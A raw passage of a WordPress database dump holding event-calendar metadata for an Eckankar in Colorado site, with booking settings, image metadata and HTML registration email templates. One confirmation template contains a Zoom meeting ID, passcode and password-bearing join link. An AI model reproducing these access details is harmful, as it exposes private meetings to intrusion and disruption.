\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183243,268479,'mec_certain_weekdays','a:0:{}'),(183244,268479,'mec_allday','0'),(183245,268479,'one_occurrence','0'),(183246,268479,'mec_hide_time','0'),(183247,268479,'mec_hide_end_time','0'),(183248,268479,'mec_comment',''),(183249,268479,'mec_timezone','global'),(183250,268479,'mec_countdown_method','global'),(183251,268479,'mec_public','1'),(183252,268479,'mec_start_date','2023-06-25'),(183253,268479,'mec_start_time_hour','4'),(183254,268479,'mec_start_time_minutes','0'),(183255,268479,'mec_start_time_ampm','PM'),(183256,268479,'mec_start_day_seconds','57600'),(183257,268479,'mec_end_date','2023-06-25'),(183258,268479,'mec_end_time_hour','5'),(183259,268479,'mec_end_time_minutes','30'),(183260,268479,'mec_end_time_ampm','PM'),(183261,268479,'mec_end_day_seconds','63000'),(183262,268479,'mec_repeat_status','0'),(183263,268479,'mec_repeat_type',''),(183264,268479,'mec_repeat_interval','1'),(183265,268479,'mec_repeat_end',''),(183266,268479,'mec_repeat_end_at_occurrences',''),(183267,268479,'mec_repeat_end_at_date',''),(183268,268479,'mec_advanced_days','a:0:{}'),(183269,268479,'mec_in_days',''),(183270,268479,'mec_not_in_days',''),(183271,268479,'mec_hourly_schedules','a:0:{}'),(183272,268479,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183273,268479,'mec_tickets','a:0:{}'),(183274,268479,'mec_fees_global_inheritance','1'),(183275,268479,'mec_fees','a:0:{}'),(183276,268479,'mec_ticket_variations_global_inheritance','1'),(183277,268479,'mec_ticket_variations','a:0:{}'),(183278,268479,'mec_reg_fields_global_inheritance','1'),(183279,268479,'mec_reg_fields','a:0:{}'),(183280,268479,'mec_bfixed_fields','a:0:{}'),(183281,268479,'mec_op','a:0:{}'),(183282,268479,'mec_fields','a:0:{}'),(183283,268479,'mec_event_status','EventScheduled'),(183284,268479,'mec_moved_online_link',''),(183285,268479,'mec_cancelled_reason',''),(183286,268479,'mec_display_cancellation_reason_in_single_page',''),(183287,268479,'boldgrid_hide_page_title','0'),(183288,268479,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(183289,268479,'passster_activate_global_protection',NULL),(183290,268479,'passster_activate_protection',NULL),(183291,268479,'passster_protection_type','password'),(183292,268479,'boldgrid_in_page_containers','1'),(183293,268479,'passster_area_shortcode',''),(183296,268479,'_dp_original','268477'),(183295,268479,'_thumbnail_id','268480'),(183297,268479,'_edit_lock','1687289801:2'),(183298,268479,'_edit_last','2'),(183299,268480,'_wp_attached_file','2023/05/HU_Heart.webp'),(183300,268480,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:21:\"2023/05/HU_Heart.webp\";s:8:\"filesize\";i:12474;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"HU_Heart-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3740;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"HU_Heart-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2474;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"HU_Heart-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5546;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"HU_Heart-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7704;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"HU_Heart-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5976;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"HU_Heart-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6416;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183301,268481,'protect_children',''),(183302,268481,'mec_color',''),(183303,268481,'mec_location_id','161'),(183304,268481,'mec_dont_show_map','0'),(183305,268481,'mec_organizer_id','1'),(183306,268481,'mec_read_more',''),(183307,268481,'mec_more_info',''),(183308,268481,'mec_more_info_title',''),(183309,268481,'mec_more_info_target','_self'),(183310,268481,'mec_cost',''),(183311,268481,'mec_currency','a:0:{}'),(183312,268481,'mec_additional_organizer_ids','a:0:{}'),(183313,268481,'mec_additional_location_ids','a:0:{}'),(183314,268481,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-04\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-04\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183315,268481,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183316,268481,'mec_certain_weekdays','a:0:{}'),(183317,268481,'mec_allday','0'),(183318,268481,'one_occurrence','0'),(183319,268481,'mec_hide_time','0'),(183320,268481,'mec_hide_end_time','0'),(183321,268481,'mec_comment',''),(183322,268481,'mec_timezone','global'),(183323,268481,'mec_countdown_method','global'),(183324,268481,'mec_public','1'),(183325,268481,'mec_start_date','2023-06-04'),(183326,268481,'mec_start_time_hour','4'),(183327,268481,'mec_start_time_minutes','0'),(183328,268481,'mec_start_time_ampm','PM'),(183329,268481,'mec_start_day_seconds','57600'),(183330,268481,'mec_end_date','2023-06-04'),(183331,268481,'mec_end_time_hour','5'),(183332,268481,'mec_end_time_minutes','30'),(183333,268481,'mec_end_time_ampm','PM'),(183334,268481,'mec_end_day_seconds','63000'),(183335,268481,'mec_repeat_status','0'),(183336,268481,'mec_repeat_type',''),(183337,268481,'mec_repeat_interval','1'),(183338,268481,'mec_repeat_end',''),(183339,268481,'mec_repeat_end_at_occurrences',''),(183340,268481,'mec_repeat_end_at_date',''),(183341,268481,'mec_advanced_days','a:0:{}'),(183342,268481,'mec_in_days',''),(183343,268481,'mec_not_in_days',''),(183344,268481,'mec_hourly_schedules','a:0:{}'),(183345,268481,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183346,268481,'mec_tickets','a:0:{}'),(183347,268481,'mec_fees_global_inheritance','1'),(183348,268481,'mec_fees','a:0:{}'),(183349,268481,'mec_ticket_variations_global_inheritance','1'),(183350,268481,'mec_ticket_variations','a:0:{}'),(183351,268481,'mec_reg_fields_global_inheritance','1'),(183352,268481,'mec_reg_fields','a:0:{}'),(183353,268481,'mec_bfixed_fields','a:0:{}'),(183354,268481,'mec_op','a:0:{}'),(183355,268481,'mec_fields','a:0:{}'),(183356,268481,'mec_event_status','EventScheduled'),(183357,268481,'mec_moved_online_link',''),(183358,268481,'mec_cancelled_reason',''),(183359,268481,'mec_display_cancellation_reason_in_single_page',''),(183360,268481,'boldgrid_hide_page_title','0'),(183361,268481,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(183362,268481,'passster_activate_global_protection',NULL),(183363,268481,'passster_activate_protection',NULL),(183364,268481,'passster_protection_type','password'),(183365,268481,'boldgrid_in_page_containers','1'),(183366,268481,'passster_area_shortcode',''),(183367,268481,'_thumbnail_id','266179'),(183369,268481,'_dp_original','268479'),(183370,268481,'_edit_lock','1684501861:15'),(183371,268481,'_edit_last','15'),(183372,268482,'mec_color',''),(183373,268482,'mec_location_id','129'),(183374,268482,'mec_dont_show_map','0'),(183375,268482,'mec_organizer_id','1'),(183376,268482,'mec_read_more',''),(183377,268482,'mec_more_info',''),(183378,268482,'mec_more_info_title',''),(183379,268482,'mec_more_info_target','_self'),(183380,268482,'mec_cost',''),(183381,268482,'mec_currency','a:0:{}'),(183382,268482,'mec_additional_organizer_ids','a:0:{}'),(183383,268482,'mec_additional_location_ids','a:0:{}'),(183384,268482,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183385,268482,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183386,268482,'mec_certain_weekdays','a:0:{}'),(183387,268482,'mec_allday','0'),(183388,268482,'one_occurrence','0'),(183389,268482,'mec_hide_time','0'),(183390,268482,'mec_hide_end_time','0'),(183391,268482,'mec_comment',''),(183392,268482,'mec_timezone','global'),(183393,268482,'mec_countdown_method','global'),(183394,268482,'mec_public','1'),(183395,268482,'mec_start_date','2023-06-11'),(183396,268482,'mec_start_time_hour','10'),(183397,268482,'mec_start_time_minutes','30'),(183398,268482,'mec_start_time_ampm','AM'),(183399,268482,'mec_start_day_seconds','37800'),(183400,268482,'mec_end_date','2023-06-11'),(183401,268482,'mec_end_time_hour','11'),(183402,268482,'mec_end_time_minutes','30'),(183403,268482,'mec_end_time_ampm','AM'),(183404,268482,'mec_end_day_seconds','41400'),(183405,268482,'mec_repeat_status','0'),(183406,268482,'mec_repeat_type',''),(183407,268482,'mec_repeat_interval','1'),(183408,268482,'mec_repeat_end',''),(183409,268482,'mec_repeat_end_at_occurrences',''),(183410,268482,'mec_repeat_end_at_date',''),(183411,268482,'mec_advanced_days','a:0:{}'),(183412,268482,'mec_in_days',''),(183413,268482,'mec_not_in_days',''),(183414,268482,'mec_hourly_schedules','a:0:{}'),(183415,268482,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183416,268482,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(183417,268482,'mec_fees_global_inheritance','1'),(183418,268482,'mec_fees','a:0:{}'),(183419,268482,'mec_ticket_variations_global_inheritance','1'),(183420,268482,'mec_ticket_variations','a:0:{}'),(183421,268482,'mec_reg_fields_global_inheritance','1'),(183422,268482,'mec_reg_fields','a:0:{}'),(183423,268482,'mec_bfixed_fields','a:0:{}'),(183424,268482,'mec_op','a:0:{}'),(183425,268482,'mec_fields','a:0:{}'),(183426,268482,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img 